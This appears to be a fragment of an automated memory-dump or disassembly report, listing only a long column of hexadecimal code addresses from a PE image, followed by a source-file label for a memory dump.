                                                                                                                                                                                      0x00406abf
                                                                                                                                                                                      0x00406ac2
                                                                                                                                                                                      0x00406ac5
                                                                                                                                                                                      0x00406aca
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407161
                                                                                                                                                                                      0x00407161
                                                                                                                                                                                      0x00407167
                                                                                                                                                                                      0x0040716d
                                                                                                                                                                                      0x00407173
                                                                                                                                                                                      0x0040718d
                                                                                                                                                                                      0x00407190
                                                                                                                                                                                      0x00407196
                                                                                                                                                                                      0x004071a1
                                                                                                                                                                                      0x004071a3
                                                                                                                                                                                      0x00407175
                                                                                                                                                                                      0x00407175
                                                                                                                                                                                      0x00407184
                                                                                                                                                                                      0x00407188
                                                                                                                                                                                      0x00407188
                                                                                                                                                                                      0x004071ad
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406af2
                                                                                                                                                                                      0x00406af4
                                                                                                                                                                                      0x00406af7
                                                                                                                                                                                      0x00406b68
                                                                                                                                                                                      0x00406b6b
                                                                                                                                                                                      0x00406b6e
                                                                                                                                                                                      0x00406b75
                                                                                                                                                                                      0x00406b7f
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00406af9
                                                                                                                                                                                      0x00406afd
                                                                                                                                                                                      0x00406b00
                                                                                                                                                                                      0x00406b02
                                                                                                                                                                                      0x00406b05
                                                                                                                                                                                      0x00406b08
                                                                                                                                                                                      0x00406b0a
                                                                                                                                                                                      0x00406b0d
                                                                                                                                                                                      0x00406b0f
                                                                                                                                                                                      0x00406b14
                                                                                                                                                                                      0x00406b17
                                                                                                                                                                                      0x00406b1a
                                                                                                                                                                                      0x00406b1e
                                                                                                                                                                                      0x00406b25
                                                                                                                                                                                      0x00406b28
                                                                                                                                                                                      0x00406b2f
                                                                                                                                                                                      0x00406b33
                                                                                                                                                                                      0x00406b3b
                                                                                                                                                                                      0x00406b3b
                                                                                                                                                                                      0x00406b3b
                                                                                                                                                                                      0x00406b35
                                                                                                                                                                                      0x00406b35
                                                                                                                                                                                      0x00406b35
                                                                                                                                                                                      0x00406b2a
                                                                                                                                                                                      0x00406b2a
                                                                                                                                                                                      0x00406b2a
                                                                                                                                                                                      0x00406b3f
                                                                                                                                                                                      0x00406b42
                                                                                                                                                                                      0x00406b60
                                                                                                                                                                                      0x00406b62
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406b44
                                                                                                                                                                                      0x00406b44
                                                                                                                                                                                      0x00406b47
                                                                                                                                                                                      0x00406b4a
                                                                                                                                                                                      0x00406b4d
                                                                                                                                                                                      0x00406b4f
                                                                                                                                                                                      0x00406b4f
                                                                                                                                                                                      0x00406b4f
                                                                                                                                                                                      0x00406b52
                                                                                                                                                                                      0x00406b55
                                                                                                                                                                                      0x00406b57
                                                                                                                                                                                      0x00406b58
                                                                                                                                                                                      0x00406b5b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406b5b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d91
                                                                                                                                                                                      0x00406d95
                                                                                                                                                                                      0x00406db3
                                                                                                                                                                                      0x00406db6
                                                                                                                                                                                      0x00406dbd
                                                                                                                                                                                      0x00406dc0
                                                                                                                                                                                      0x00406dc3
                                                                                                                                                                                      0x00406dc6
                                                                                                                                                                                      0x00406dc9
                                                                                                                                                                                      0x00406dcc
                                                                                                                                                                                      0x00406dce
                                                                                                                                                                                      0x00406dd5
                                                                                                                                                                                      0x00406dd6
                                                                                                                                                                                      0x00406dd8
                                                                                                                                                                                      0x00406ddb
                                                                                                                                                                                      0x00406dde
                                                                                                                                                                                      0x00406de1
                                                                                                                                                                                      0x00406de1
                                                                                                                                                                                      0x00406de6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406de6
                                                                                                                                                                                      0x00406d97
                                                                                                                                                                                      0x00406d9a
                                                                                                                                                                                      0x00406d9d
                                                                                                                                                                                      0x00406da7
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406dfb
                                                                                                                                                                                      0x00406dff
                                                                                                                                                                                      0x00406e22
                                                                                                                                                                                      0x00406e25
                                                                                                                                                                                      0x00406e28
                                                                                                                                                                                      0x00406e32
                                                                                                                                                                                      0x00406e01
                                                                                                                                                                                      0x00406e01
                                                                                                                                                                                      0x00406e04
                                                                                                                                                                                      0x00406e07
                                                                                                                                                                                      0x00406e0a
                                                                                                                                                                                      0x00406e17
                                                                                                                                                                                      0x00406e1a
                                                                                                                                                                                      0x00406e1a
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e3e
                                                                                                                                                                                      0x00406e42
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e48
                                                                                                                                                                                      0x00406e4c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e52
                                                                                                                                                                                      0x00406e54
                                                                                                                                                                                      0x00406e58
                                                                                                                                                                                      0x00406e58
                                                                                                                                                                                      0x00406e5b
                                                                                                                                                                                      0x00406e5f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406ed6
                                                                                                                                                                                      0x00406eda
                                                                                                                                                                                      0x00406ee1
                                                                                                                                                                                      0x00406ee4
                                                                                                                                                                                      0x00406ee7
                                                                                                                                                                                      0x00406edc
                                                                                                                                                                                      0x00406edc
                                                                                                                                                                                      0x00406edc
                                                                                                                                                                                      0x00406eea
                                                                                                                                                                                      0x00406eed
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f96
                                                                                                                                                                                      0x00406f96
                                                                                                                                                                                      0x00406f9a
                                                                                                                                                                                      0x00407338
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407338
                                                                                                                                                                                      0x00406fa0
                                                                                                                                                                                      0x00406fa3
                                                                                                                                                                                      0x00406fa6
                                                                                                                                                                                      0x00406faa
                                                                                                                                                                                      0x00406fad
                                                                                                                                                                                      0x00406fb3
                                                                                                                                                                                      0x00406fb5
                                                                                                                                                                                      0x00406fb5
                                                                                                                                                                                      0x00406fb5
                                                                                                                                                                                      0x00406fb8
                                                                                                                                                                                      0x00406fbb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406b8b
                                                                                                                                                                                      0x00406b8b
                                                                                                                                                                                      0x00406b8f
                                                                                                                                                                                      0x004072fc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072fc
                                                                                                                                                                                      0x00406b95
                                                                                                                                                                                      0x00406b98
                                                                                                                                                                                      0x00406b9b
                                                                                                                                                                                      0x00406b9f
                                                                                                                                                                                      0x00406ba2
                                                                                                                                                                                      0x00406ba8
                                                                                                                                                                                      0x00406baa
                                                                                                                                                                                      0x00406baa
                                                                                                                                                                                      0x00406baa
                                                                                                                                                                                      0x00406bad
                                                                                                                                                                                      0x00406bb0
                                                                                                                                                                                      0x00406bb0
                                                                                                                                                                                      0x00406bb3
                                                                                                                                                                                      0x00406bb6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406bbc
                                                                                                                                                                                      0x00406bc2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406bc8
                                                                                                                                                                                      0x00406bc8
                                                                                                                                                                                      0x00406bcc
                                                                                                                                                                                      0x00406bcf
                                                                                                                                                                                      0x00406bd2
                                                                                                                                                                                      0x00406bd5
                                                                                                                                                                                      0x00406bd8
                                                                                                                                                                                      0x00406bd9
                                                                                                                                                                                      0x00406bdc
                                                                                                                                                                                      0x00406bde
                                                                                                                                                                                      0x00406be4
                                                                                                                                                                                      0x00406be7
                                                                                                                                                                                      0x00406bea
                                                                                                                                                                                      0x00406bed
                                                                                                                                                                                      0x00406bf0
                                                                                                                                                                                      0x00406bf3
                                                                                                                                                                                      0x00406bf6
                                                                                                                                                                                      0x00406c12
                                                                                                                                                                                      0x00406c15
                                                                                                                                                                                      0x00406c18
                                                                                                                                                                                      0x00406c1b
                                                                                                                                                                                      0x00406c22
                                                                                                                                                                                      0x00406c26
                                                                                                                                                                                      0x00406c28
                                                                                                                                                                                      0x00406c2c
                                                                                                                                                                                      0x00406bf8
                                                                                                                                                                                      0x00406bf8
                                                                                                                                                                                      0x00406bfc
                                                                                                                                                                                      0x00406c04
                                                                                                                                                                                      0x00406c09
                                                                                                                                                                                      0x00406c0b
                                                                                                                                                                                      0x00406c0d
                                                                                                                                                                                      0x00406c0d
                                                                                                                                                                                      0x00406c2f
                                                                                                                                                                                      0x00406c36
                                                                                                                                                                                      0x00406c39
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c3f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c3f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c44
                                                                                                                                                                                      0x00406c44
                                                                                                                                                                                      0x00406c48
                                                                                                                                                                                      0x00407308
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407308
                                                                                                                                                                                      0x00406c4e
                                                                                                                                                                                      0x00406c51
                                                                                                                                                                                      0x00406c54
                                                                                                                                                                                      0x00406c58
                                                                                                                                                                                      0x00406c5b
                                                                                                                                                                                      0x00406c61
                                                                                                                                                                                      0x00406c63
                                                                                                                                                                                      0x00406c63
                                                                                                                                                                                      0x00406c63
                                                                                                                                                                                      0x00406c66
                                                                                                                                                                                      0x00406c69
                                                                                                                                                                                      0x00406c69
                                                                                                                                                                                      0x00406c69
                                                                                                                                                                                      0x00406c6f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c71
                                                                                                                                                                                      0x00406c74
                                                                                                                                                                                      0x00406c77
                                                                                                                                                                                      0x00406c7a
                                                                                                                                                                                      0x00406c7d
                                                                                                                                                                                      0x00406c80
                                                                                                                                                                                      0x00406c83
                                                                                                                                                                                      0x00406c86
                                                                                                                                                                                      0x00406c89
                                                                                                                                                                                      0x00406c8c
                                                                                                                                                                                      0x00406c8f
                                                                                                                                                                                      0x00406ca7
                                                                                                                                                                                      0x00406caa
                                                                                                                                                                                      0x00406cad
                                                                                                                                                                                      0x00406cb0
                                                                                                                                                                                      0x00406cb0
                                                                                                                                                                                      0x00406cb3
                                                                                                                                                                                      0x00406cb7
                                                                                                                                                                                      0x00406cb9
                                                                                                                                                                                      0x00406c91
                                                                                                                                                                                      0x00406c91
                                                                                                                                                                                      0x00406c99
                                                                                                                                                                                      0x00406c9e
                                                                                                                                                                                      0x00406ca0
                                                                                                                                                                                      0x00406ca2
                                                                                                                                                                                      0x00406ca2
                                                                                                                                                                                      0x00406cbc
                                                                                                                                                                                      0x00406cc3
                                                                                                                                                                                      0x00406cc6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cc8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cc8
                                                                                                                                                                                      0x00406cc6
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d08
                                                                                                                                                                                      0x00406d08
                                                                                                                                                                                      0x00406d0c
                                                                                                                                                                                      0x00407314
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407314
                                                                                                                                                                                      0x00406d12
                                                                                                                                                                                      0x00406d15
                                                                                                                                                                                      0x00406d18
                                                                                                                                                                                      0x00406d1c
                                                                                                                                                                                      0x00406d1f
                                                                                                                                                                                      0x00406d25
                                                                                                                                                                                      0x00406d27
                                                                                                                                                                                      0x00406d27
                                                                                                                                                                                      0x00406d27
                                                                                                                                                                                      0x00406d2a
                                                                                                                                                                                      0x00406d2d
                                                                                                                                                                                      0x00406d2d
                                                                                                                                                                                      0x00406d33
                                                                                                                                                                                      0x00406cd1
                                                                                                                                                                                      0x00406cd1
                                                                                                                                                                                      0x00406cd4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cd4
                                                                                                                                                                                      0x00406d35
                                                                                                                                                                                      0x00406d35
                                                                                                                                                                                      0x00406d38
                                                                                                                                                                                      0x00406d3b
                                                                                                                                                                                      0x00406d3e
                                                                                                                                                                                      0x00406d41
                                                                                                                                                                                      0x00406d44
                                                                                                                                                                                      0x00406d47
                                                                                                                                                                                      0x00406d4a
                                                                                                                                                                                      0x00406d4d
                                                                                                                                                                                      0x00406d50
                                                                                                                                                                                      0x00406d53
                                                                                                                                                                                      0x00406d6b
                                                                                                                                                                                      0x00406d6e
                                                                                                                                                                                      0x00406d71
                                                                                                                                                                                      0x00406d74
                                                                                                                                                                                      0x00406d74
                                                                                                                                                                                      0x00406d77
                                                                                                                                                                                      0x00406d7b
                                                                                                                                                                                      0x00406d7d
                                                                                                                                                                                      0x00406d55
                                                                                                                                                                                      0x00406d55
                                                                                                                                                                                      0x00406d5d
                                                                                                                                                                                      0x00406d62
                                                                                                                                                                                      0x00406d64
                                                                                                                                                                                      0x00406d66
                                                                                                                                                                                      0x00406d66
                                                                                                                                                                                      0x00406d80
                                                                                                                                                                                      0x00406d87
                                                                                                                                                                                      0x00406d8a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d8c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d8c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407019
                                                                                                                                                                                      0x00407019
                                                                                                                                                                                      0x0040701d
                                                                                                                                                                                      0x00407344
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407344
                                                                                                                                                                                      0x00407023
                                                                                                                                                                                      0x00407026
                                                                                                                                                                                      0x00407029
                                                                                                                                                                                      0x0040702d
                                                                                                                                                                                      0x00407030
                                                                                                                                                                                      0x00407036
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x0040703b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407128
                                                                                                                                                                                      0x0040712c
                                                                                                                                                                                      0x0040714e
                                                                                                                                                                                      0x00407151
                                                                                                                                                                                      0x0040715b
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040712e
                                                                                                                                                                                      0x00407131
                                                                                                                                                                                      0x00407135
                                                                                                                                                                                      0x00407138
                                                                                                                                                                                      0x00407138
                                                                                                                                                                                      0x0040713b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071e5
                                                                                                                                                                                      0x004071e9
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x0040720e
                                                                                                                                                                                      0x00407215
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x004071eb
                                                                                                                                                                                      0x004071ee
                                                                                                                                                                                      0x004071f1
                                                                                                                                                                                      0x004071f4
                                                                                                                                                                                      0x004071fb
                                                                                                                                                                                      0x0040713f
                                                                                                                                                                                      0x0040713f
                                                                                                                                                                                      0x00407142
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072d6
                                                                                                                                                                                      0x004072d9
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f10
                                                                                                                                                                                      0x00406f12
                                                                                                                                                                                      0x00406f19
                                                                                                                                                                                      0x00406f1a
                                                                                                                                                                                      0x00406f1c
                                                                                                                                                                                      0x00406f1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f27
                                                                                                                                                                                      0x00406f2a
                                                                                                                                                                                      0x00406f2d
                                                                                                                                                                                      0x00406f2f
                                                                                                                                                                                      0x00406f31
                                                                                                                                                                                      0x00406f31
                                                                                                                                                                                      0x00406f32
                                                                                                                                                                                      0x00406f35
                                                                                                                                                                                      0x00406f3c
                                                                                                                                                                                      0x00406f3f
                                                                                                                                                                                      0x00406f4d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407223
                                                                                                                                                                                      0x00407223
                                                                                                                                                                                      0x00407226
                                                                                                                                                                                      0x0040722d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407232
                                                                                                                                                                                      0x00407232
                                                                                                                                                                                      0x00407236
                                                                                                                                                                                      0x0040736e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040736e
                                                                                                                                                                                      0x0040723c
                                                                                                                                                                                      0x0040723f
                                                                                                                                                                                      0x00407242
                                                                                                                                                                                      0x00407246
                                                                                                                                                                                      0x00407249
                                                                                                                                                                                      0x0040724f
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407254
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x0040725a
                                                                                                                                                                                      0x0040725a
                                                                                                                                                                                      0x0040725e
                                                                                                                                                                                      0x004072be
                                                                                                                                                                                      0x004072c1
                                                                                                                                                                                      0x004072c6
                                                                                                                                                                                      0x004072c7
                                                                                                                                                                                      0x004072c9
                                                                                                                                                                                      0x004072cb
                                                                                                                                                                                      0x004072ce
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071e0
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00407260
                                                                                                                                                                                      0x00407266
                                                                                                                                                                                      0x00407269
                                                                                                                                                                                      0x0040726c
                                                                                                                                                                                      0x0040726f
                                                                                                                                                                                      0x00407272
                                                                                                                                                                                      0x00407275
                                                                                                                                                                                      0x00407278
                                                                                                                                                                                      0x0040727b
                                                                                                                                                                                      0x0040727e
                                                                                                                                                                                      0x00407281
                                                                                                                                                                                      0x0040729a
                                                                                                                                                                                      0x0040729d
                                                                                                                                                                                      0x004072a0
                                                                                                                                                                                      0x004072a3
                                                                                                                                                                                      0x004072a7
                                                                                                                                                                                      0x004072a9
                                                                                                                                                                                      0x004072a9
                                                                                                                                                                                      0x004072aa
                                                                                                                                                                                      0x004072ad
                                                                                                                                                                                      0x00407283
                                                                                                                                                                                      0x00407283
                                                                                                                                                                                      0x0040728b
                                                                                                                                                                                      0x00407290
                                                                                                                                                                                      0x00407292
                                                                                                                                                                                      0x00407295
                                                                                                                                                                                      0x00407295
                                                                                                                                                                                      0x004072b0
                                                                                                                                                                                      0x004072b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072b9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072b9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f55
                                                                                                                                                                                      0x00406f58
                                                                                                                                                                                      0x00406f8e
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c4
                                                                                                                                                                                      0x004070c6
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x004070cc
                                                                                                                                                                                      0x004070cf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070d5
                                                                                                                                                                                      0x004070d9
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00406f5a
                                                                                                                                                                                      0x00406f5c
                                                                                                                                                                                      0x00406f5e
                                                                                                                                                                                      0x00406f60
                                                                                                                                                                                      0x00406f63
                                                                                                                                                                                      0x00406f64
                                                                                                                                                                                      0x00406f66
                                                                                                                                                                                      0x00406f68
                                                                                                                                                                                      0x00406f6b
                                                                                                                                                                                      0x00406f6e
                                                                                                                                                                                      0x00406f84
                                                                                                                                                                                      0x00406f89
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc5
                                                                                                                                                                                      0x00406ff1
                                                                                                                                                                                      0x00406ff3
                                                                                                                                                                                      0x00406ffa
                                                                                                                                                                                      0x00406ffd
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407007
                                                                                                                                                                                      0x0040700a
                                                                                                                                                                                      0x00407011
                                                                                                                                                                                      0x00407014
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407044
                                                                                                                                                                                      0x00407047
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00407049
                                                                                                                                                                                      0x0040704f
                                                                                                                                                                                      0x00407052
                                                                                                                                                                                      0x00407055
                                                                                                                                                                                      0x00407058
                                                                                                                                                                                      0x0040705b
                                                                                                                                                                                      0x0040705e
                                                                                                                                                                                      0x00407061
                                                                                                                                                                                      0x00407064
                                                                                                                                                                                      0x00407067
                                                                                                                                                                                      0x0040706a
                                                                                                                                                                                      0x00407083
                                                                                                                                                                                      0x00407085
                                                                                                                                                                                      0x00407088
                                                                                                                                                                                      0x00407089
                                                                                                                                                                                      0x0040708c
                                                                                                                                                                                      0x0040708e
                                                                                                                                                                                      0x00407091
                                                                                                                                                                                      0x00407093
                                                                                                                                                                                      0x00407095
                                                                                                                                                                                      0x00407098
                                                                                                                                                                                      0x0040709a
                                                                                                                                                                                      0x0040709d
                                                                                                                                                                                      0x004070a1
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a4
                                                                                                                                                                                      0x004070a7
                                                                                                                                                                                      0x004070aa
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x00407074
                                                                                                                                                                                      0x00407079
                                                                                                                                                                                      0x0040707b
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x004070ad
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x00406fc7
                                                                                                                                                                                      0x00406fca
                                                                                                                                                                                      0x00406fcc
                                                                                                                                                                                      0x00406fcf
                                                                                                                                                                                      0x00406fd2
                                                                                                                                                                                      0x00406fd5
                                                                                                                                                                                      0x00406fd7
                                                                                                                                                                                      0x00406fda
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe3
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406f70
                                                                                                                                                                                      0x00406f73
                                                                                                                                                                                      0x00406f75
                                                                                                                                                                                      0x00406f78
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cdb
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00406ce1
                                                                                                                                                                                      0x00406ce4
                                                                                                                                                                                      0x00406ce7
                                                                                                                                                                                      0x00406cea
                                                                                                                                                                                      0x00406ced
                                                                                                                                                                                      0x00406cf0
                                                                                                                                                                                      0x00406cf3
                                                                                                                                                                                      0x00406cf5
                                                                                                                                                                                      0x00406cf8
                                                                                                                                                                                      0x00406cfb
                                                                                                                                                                                      0x00406cfe
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e66
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00406e6c
                                                                                                                                                                                      0x00406e6f
                                                                                                                                                                                      0x00406e72
                                                                                                                                                                                      0x00406e75
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e7a
                                                                                                                                                                                      0x00406e7d
                                                                                                                                                                                      0x00406e80
                                                                                                                                                                                      0x00406e83
                                                                                                                                                                                      0x00406e86
                                                                                                                                                                                      0x00406e89
                                                                                                                                                                                      0x00406e8a
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8f
                                                                                                                                                                                      0x00406e92
                                                                                                                                                                                      0x00406e95
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e9b
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070e9
                                                                                                                                                                                      0x004070ec
                                                                                                                                                                                      0x004070ef
                                                                                                                                                                                      0x004070f2
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f7
                                                                                                                                                                                      0x004070fa
                                                                                                                                                                                      0x004070fd
                                                                                                                                                                                      0x00407100
                                                                                                                                                                                      0x00407103
                                                                                                                                                                                      0x00407106
                                                                                                                                                                                      0x00407107
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x0040710c
                                                                                                                                                                                      0x0040710f
                                                                                                                                                                                      0x00407112
                                                                                                                                                                                      0x00407115
                                                                                                                                                                                      0x00407118
                                                                                                                                                                                      0x0040711c
                                                                                                                                                                                      0x0040711e
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407123
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00407356
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406985
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00407161
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406eb3

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
